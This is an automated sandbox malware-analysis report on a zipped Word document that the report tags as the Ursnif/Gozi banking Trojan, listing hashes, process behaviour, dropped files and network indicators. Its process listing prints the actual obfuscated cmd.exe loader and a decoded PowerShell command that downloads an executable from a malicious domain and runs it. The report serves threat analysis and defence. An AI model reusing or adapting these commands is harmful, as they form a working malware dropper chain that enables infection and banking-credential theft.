analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Chevrolet_Buick.zip

Full analysis: https://app.any.run/tasks/73661d47-a8ef-4fb8-a7bd-39a16b1301a4
Verdict: Malicious activity
Threats:

Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world.

Analysis date: December 14, 2018, 14:37:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
gozi
ursnif
maldoc-1
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

074F4077FE8FD78F14515D5F82D7899F

SHA1:

917C37C0D540968375BC71CE9F6307E68D20F6D3

SHA256:

429368EAD6E3BE5F3CC8E3A6B2A53C31B6A2A2F3F0C20ED75D25BFC835A8A98A

SSDEEP:

768:fx+uRtjx9Dfqr70gqPU6tpkjRePKmN+kAMgUm0QQOAltpHbJfL5FMhtenrudoTCF:VRtfDfPqRQ/AUz5ltnEenrYoW4S6E6q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 296)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 296)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3660)
    • URSNIF was detected

      • powershell.exe (PID: 932)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 2832)
    • Application launched itself

      • cmd.exe (PID: 3708)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3256)
      • cmd.exe (PID: 3660)
      • cmd.exe (PID: 792)
      • cmd.exe (PID: 3708)
    • Creates files in the user directory

      • powershell.exe (PID: 932)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 296)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 296)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2018:12:14 12:42:06
ZipCRC: 0xf0feab73
ZipCompressedSize: 55275
ZipUncompressedSize: 100608
ZipFileName: Information-1214.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
11
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs explorer.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs find.exe no specs #URSNIF powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2832"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Chevrolet_Buick.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2396"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
296"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2832.35777\Information-1214.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3256c:\kipiGwHbIilOR\VIjvMnZmObQiMz\kROOPnMrr\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set TZjb=WUKdJwCvlXPbRYzpbjwMJh-a.)}8,i(m:t{kg/r eyD=x$cN01G\?+oTZSq@OnfHuI;FE56's&&for %z in (45,68,31,47,43,71,10,0,29,71,66,45,58,8,20,43,61,40,18,22,54,16,17,40,46,33,39,47,40,33,24,0,40,16,6,8,29,40,61,33,66,45,62,56,15,43,71,21,33,33,15,32,37,37,41,64,8,23,18,61,40,72,72,40,24,46,54,31,37,33,41,46,8,23,31,37,62,38,40,72,72,38,24,15,21,15,52,8,43,18,41,36,44,49,69,24,33,35,61,71,24,57,15,8,29,33,30,71,59,71,25,66,45,23,7,63,43,71,65,46,35,71,66,45,23,58,1,39,43,39,71,49,70,70,71,66,45,55,56,46,43,71,33,50,58,71,66,45,60,55,13,43,45,40,61,7,32,33,40,31,15,53,71,51,71,53,45,23,58,1,53,71,24,40,44,40,71,66,62,54,38,40,23,46,21,30,45,62,3,67,39,29,61,39,45,62,56,15,25,34,33,38,41,34,45,58,8,20,24,42,54,18,61,8,54,23,3,67,29,8,40,30,45,62,3,67,28,39,45,60,55,13,25,66,45,60,7,21,43,71,50,33,54,71,66,65,62,39,30,30,50,40,33,22,65,33,40,31,39,45,60,55,13,25,24,8,40,61,36,33,21,39,22,36,40,39,27,48,48,48,48,25,39,34,65,61,7,54,35,40,22,65,33,40,31,39,45,60,55,13,66,45,47,3,68,43,71,23,46,20,71,66,16,38,40,23,35,66,26,26,46,23,33,46,21,34,26,26,45,12,3,17,43,71,31,35,8,71,66,74)do set x0=!x0!!TZjb:~%z,1!&&if %z gtr 73 echo !x0:~-339!|FOR /F "delims=Oy.D1 tokens=2" %W IN ('ftype^^^|find "a.1="')DO %W -"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3708CmD /V:O/C"set TZjb=WUKdJwCvlXPbRYzpbjwMJh-a.)}8,i(m:t{kg/r eyD=x$cN01G\?+oTZSq@OnfHuI;FE56's&&for %z in (45,68,31,47,43,71,10,0,29,71,66,45,58,8,20,43,61,40,18,22,54,16,17,40,46,33,39,47,40,33,24,0,40,16,6,8,29,40,61,33,66,45,62,56,15,43,71,21,33,33,15,32,37,37,41,64,8,23,18,61,40,72,72,40,24,46,54,31,37,33,41,46,8,23,31,37,62,38,40,72,72,38,24,15,21,15,52,8,43,18,41,36,44,49,69,24,33,35,61,71,24,57,15,8,29,33,30,71,59,71,25,66,45,23,7,63,43,71,65,46,35,71,66,45,23,58,1,39,43,39,71,49,70,70,71,66,45,55,56,46,43,71,33,50,58,71,66,45,60,55,13,43,45,40,61,7,32,33,40,31,15,53,71,51,71,53,45,23,58,1,53,71,24,40,44,40,71,66,62,54,38,40,23,46,21,30,45,62,3,67,39,29,61,39,45,62,56,15,25,34,33,38,41,34,45,58,8,20,24,42,54,18,61,8,54,23,3,67,29,8,40,30,45,62,3,67,28,39,45,60,55,13,25,66,45,60,7,21,43,71,50,33,54,71,66,65,62,39,30,30,50,40,33,22,65,33,40,31,39,45,60,55,13,25,24,8,40,61,36,33,21,39,22,36,40,39,27,48,48,48,48,25,39,34,65,61,7,54,35,40,22,65,33,40,31,39,45,60,55,13,66,45,47,3,68,43,71,23,46,20,71,66,16,38,40,23,35,66,26,26,46,23,33,46,21,34,26,26,45,12,3,17,43,71,31,35,8,71,66,74)do set x0=!x0!!TZjb:~%z,1!&&if %z gtr 73 echo !x0:~-339!|FOR /F "delims=Oy.D1 tokens=2" %W IN ('ftype^^^|find "a.1="')DO %W -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2736C:\Windows\system32\cmd.exe /S /D /c" echo $EmN='PWi';$qlJ=new-object Net.WebClient;$fZp='http://yulawnesse.com/tyclam/fressr.php?l=wygx15.tkn'.Split('@');$avH='Ick';$aqU = '166';$TZc='tGq';$OTY=$env:temp+'\'+$aqU+'.exe';foreach($fdF in $fZp){try{$qlJ.DownloadFile($fdF, $OTY);$Ovh='Gto';If ((Get-Item $OTY).length -ge 80000) {Invoke-Item $OTY;$NdE='acJ';break;}}catch{}}$Rdj='mkl';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3660C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=Oy.D1 tokens=2" %W IN ('ftype^|find "a.1="') DO %W -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
792C:\Windows\system32\cmd.exe /c ftype|find "a.1="C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2372C:\Windows\system32\cmd.exe /S /D /c" ftype"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2424find "a.1="C:\Windows\system32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 937
Read events
1 459
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
296WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA440.tmp.cvr
MD5:
SHA256:
296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DFA9DD7F.wmf
MD5:
SHA256:
296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F9E42E5.wmf
MD5:
SHA256:
932powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F0POEXXIN1H8K1IRDP0T.temp
MD5:
SHA256:
296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\541AC1F6.wmfwmf
MD5:2437D50B7FB395B9675B326C8D774A70
SHA256:9B6F06F18AA6B4181E5C06CF737F3D26A0D70CA12B0F41CF03759358DADD24B7
932powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ab8c2.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2832WinRAR.exeC:\Users\admin\AppData\Local\Temp\Chevrolet_Buick\Information-1214.docdocument
MD5:8D1712A695E2EE601A9F6ED432CB3938
SHA256:CFAF975A4A023D724151DD10CD55FA40C6FE671373211EAB28A41C61D7ADA22F
296WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:596DD7EF8A58C0B76B5D15E7427BCAFE
SHA256:805B6F21D27E312F1002C1400AD1B88F840A13BE65B794BB55D6A555BB37519F
932powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB47D974.wmfwmf
MD5:665382FAC97475D3B93D3D58EB22BC08
SHA256:6CDF1D19F1E380CF754B86F205C572F3124E61BFB15D863132092519D0539999
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
932
powershell.exe
GET
404
94.177.229.49:80
http://yulawnesse.com/tyclam/fressr.php?l=wygx15.tkn
DE
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
932
powershell.exe
94.177.229.49:80
yulawnesse.com
Aruba SAS
DE
suspicious

DNS requests

Domain
IP
Reputation
yulawnesse.com
  • 94.177.229.49
malicious

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info